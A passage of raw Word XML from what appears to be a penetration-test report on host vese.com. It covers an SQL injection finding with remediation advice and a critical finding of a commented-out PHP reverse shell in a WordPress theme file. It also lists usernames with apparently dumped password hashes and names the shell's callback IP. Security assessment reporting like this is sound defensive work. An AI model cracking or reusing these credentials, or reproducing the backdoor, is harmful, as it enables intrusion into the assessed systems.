          <w:p w14:paraId="5BF1357F" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>6f299895ed844bd22404cfd69b3b6e2c</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="6A87718F" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2505" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00322830" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bgenbu</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7575" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1F3C61FA" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>ffd9ab7908160075448185d7620ecd38</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="5FCFF6DF" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2505" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="691C7CF3" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>decryptme</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7575" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="04F255BD" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>ee234f62b7578420925a2307b51c64b3ca153ad7336d8636f7ac3e1a8888e6c2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="7C42E1DC" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2505" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="483EA03A" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>eladministrador</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7575" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2595BB65" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>0db613e31e5b53a238e35469d752ffa6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2CDFC2C3" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F3F86D6" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a7"/>
        <w:tblW w:w="10080" w:type="dxa"/>
        <w:tblInd w:w="-7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2"/>
        <w:gridCol w:w="8208"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="327C7B2F" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE"/>
          </w:tcPr>
          <w:p w14:paraId="63248AF8" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:right="-170" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
              <w:t>Who:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BF43406" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:t>IT Team</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="19689931" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE"/>
          </w:tcPr>
          <w:p w14:paraId="6C8E8BF8" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:right="-170" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
              <w:t>Vector:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="339C9764" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:t>Remote</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="2C66142B" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE"/>
          </w:tcPr>
          <w:p w14:paraId="5CC9B9AD" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:right="-170" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
              <w:t>Action:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41E509A0" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:t>The suggested remediations for this issue are:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AAF088F" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:numPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">only executing SQL queries through prepared statements, as already devised in the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>DB.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">file available in the same sources directory; the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t>query</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> function is already designed to accept query arguments as additional parameters, which make it the quickest and simplest solution for this vulnerability</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77E809B9" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:numPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">as a </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>temporary measure</w:t>
            </w:r>
            <w:r>
              <w:t>, it could be possible to simply limit filter the incoming requests for the login form through a WAF (Web Application Firewall) product, by blocking requests containing possibly malicious payloads</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BC9EBC1" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>if the previous options are not viable, another simple solution for the issue would be to validate the incoming usernames to ensure only alpha-numeric characters are present, and rejecting/sanitizing any other character</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="63209348" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73BF0CF1" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_heading=h.t3b7ii8vykas" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Presence of Backdoors/Indicators of Compromise (IOC) – vese.com</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>(Critical Severity)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036066F3" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a8"/>
        <w:tblW w:w="10080" w:type="dxa"/>
        <w:tblInd w:w="-7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2"/>
        <w:gridCol w:w="8208"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="706EC179" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE"/>
          </w:tcPr>
          <w:p w14:paraId="245A333F" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:right="-170" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
              <w:t>Description:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="336CCFDB" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:t>Multiple Indicators of Compromise (IOC) have been found throughout the assessed host, which might probably indicate the current (or past) presence of attackers inside the asset, which could have achieved persistence through currently present (or already patched) vulnerabilities.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="43185553" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE"/>
          </w:tcPr>
          <w:p w14:paraId="640132A5" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:right="-170" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
              <w:t>Impact:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="980000"/>
          </w:tcPr>
          <w:p w14:paraId="1D00CF2B" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="790DE495" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE"/>
          </w:tcPr>
          <w:p w14:paraId="178E2D8B" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:right="-170" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
              <w:t>System:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4475DF8C" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:t>Host: vese.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="6EE7F415" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="413"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE"/>
          </w:tcPr>
          <w:p w14:paraId="25072975" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:right="-170" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
              <w:t>References:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1ECE34C3" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:hyperlink r:id="rId22">
              <w:r>
                <w:rPr>
                  <w:color w:val="1155CC"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>https://www.invicti.com/blog/web-security/understanding-reverse-shells/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="67CAECB6" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:hyperlink r:id="rId23">
              <w:r>
                <w:rPr>
                  <w:color w:val="1155CC"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>https://www.wordfence.com/learn/finding-removing-backdoors/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="538BAE08" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2">
      <w:pPr>
        <w:ind w:right="1"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30A05208" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:right="1"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Exploitation Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1177D0AE" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:r>
        <w:t>The following are examples of persistence vectors found on the target system, which can be leveraged by attackers for future access to the machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8D5989" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2"/>
    <w:p w14:paraId="15B0AAB3" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a9"/>
        <w:tblW w:w="84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0"/>
        <w:gridCol w:w="7260"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="1778DC69" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1230" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="7F7F7F"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="359144E8" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:eastAsia="Century Gothic" w:hAnsi="Century Gothic" w:cs="Century Gothic"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:eastAsia="Century Gothic" w:hAnsi="Century Gothic" w:cs="Century Gothic"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7260" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="210D54BF" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:r>
              <w:t>/home/it_consultant/vese-projects-code/websites/public/wordpress/wp-content/themes/twentytwentytwo/functions.php, lines 18-127</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="6AD0426B" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1230" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="7F7F7F"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="12AC6464" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:eastAsia="Century Gothic" w:hAnsi="Century Gothic" w:cs="Century Gothic"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:eastAsia="Century Gothic" w:hAnsi="Century Gothic" w:cs="Century Gothic"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>IOC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7260" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7A94054D" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A PHP reverse shell, now commented has been found inside the aforementioned file; it might have been used to achieve code execution on the target machine, by </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>receiving  commands</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> from the remote IP 158.46.250.151</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B9C44EC" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="550CE594" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
